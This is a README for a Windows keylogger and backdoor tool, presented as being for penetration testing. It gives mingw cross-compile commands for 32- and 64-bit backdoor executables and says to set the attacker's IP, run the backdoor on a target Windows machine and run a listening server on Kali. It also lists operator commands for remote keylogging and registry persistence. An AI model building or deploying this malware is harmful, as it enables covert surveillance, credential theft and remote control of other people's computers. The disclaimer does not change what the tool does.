Keylogger malware for penetration testing in Windows platforms. PLEASE USE WITH RESPONSABILITY. I AM NOT RESPONSABLE FOR MISUSE OF THIS SOFTWARE FOR ILLEGAL PURPOSES.
- Create connection with server (inside a main function)
- Create shell function (wait for incoming command and iterate over certain options)
- Automatically start program when machine is rebooted
- Start/spawn other programs
- Navigate through different directories
- Implement keylogger to backdoor
sudo apt-get install mingw-w64
i686-w64-mingw32-gcc -o backdoor_win32.exe backdoor.c -lwsock32 -lwininet
x86_64-w64-mingw32-gcc -o backdoor_win64.exe backdoor.c -lwsock32 -lwininet
gcc server.c -o server.o
Replace in both server.c and backdoor.c files the server IP address (the attacker) "xxx.xxx.x.xx" with the actual IP address, which can be retrieved using ifconfig.
After compiling, run backdoor_win32.exe or backdoor_win64.exe in the target machine, preferably Windows 7. On a Linux machine, preferably Kali Linux, run server.o.
keylog_start - starts keylogger in target machine
persist - creates persistence in target machine registry
q - quit